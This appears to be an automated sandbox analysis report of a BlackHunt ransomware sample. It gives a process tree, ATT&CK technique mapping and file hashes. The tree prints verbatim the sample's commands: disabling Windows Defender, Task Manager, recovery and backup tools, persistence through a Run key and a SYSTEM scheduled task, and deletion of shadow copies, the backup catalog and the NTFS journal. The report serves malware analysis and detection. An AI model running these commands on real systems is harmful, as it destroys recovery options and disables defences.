C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2892
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:3808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3336
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2788
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵
- Modifies registry class
PID:1236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:5032
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4600
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:5780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1544
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:5364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2504
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:5812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4436
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:5860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:556
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:5844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4924
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3376
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1192
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe" /F2⤵PID:4476
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe" /F3⤵
- Creates scheduled task(s)
PID:544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4368
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:6080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1784
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3400
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3388
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4788
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3256
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1700
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3640
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1272
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2420
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2248
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4848
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:5920
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3756
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:556
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5358f9cae7cb16f696c680ecd1848d74e
SHA1c3bc99257e64db120e809c1d4e1b4fa9acdd73f9
SHA2564f578eabc92db51c550646888dda38ae1976754212fa617465ef83c36f78ce47
SHA512130c27ece49bf119aeb3f12469a70980e9460e1e1a21f5d8cbd1c6acc0fe4a3a91e63162bb53bdf75020b18d849d8d718796e44bb69c99e1e05afcae6b9e3dc8
-
Filesize
684B
MD54338ab4cffd23625ff26b02d9cbe08d2
SHA19f02a1028b84974c82f386a3adf459220562ad43
SHA256ca7d22946a3001b80ffebefb6f76a66e1b7389e4b770a4664fd338f9a37bdd9f
SHA5124b2b3d8cb897d384e64e96a7994a1352bdfd4e1f202ce1bd6d518a80251b42fad42847f1ae10cd38e2c18e6a90a6cadc8c34d140d92244268aad85baab167125
-
Filesize
1KB
MD5de43ee271a7eaec704fba956059ea827
SHA115619f367694eca9dcf7d6ec5b6ad238f58f011e
SHA256b3adc1c3252cfc58eb0b5c0eed2e291be99259fa491f3dc0fd4f2c168c923229
SHA512a376b165703cc906b959164e01cfc4fa7e79d9e056daee8831d39806a3b812090c0d4b5634cf29bae70c6518e7fe455ea9f8c517fb182e9fbbf53099a28c19f3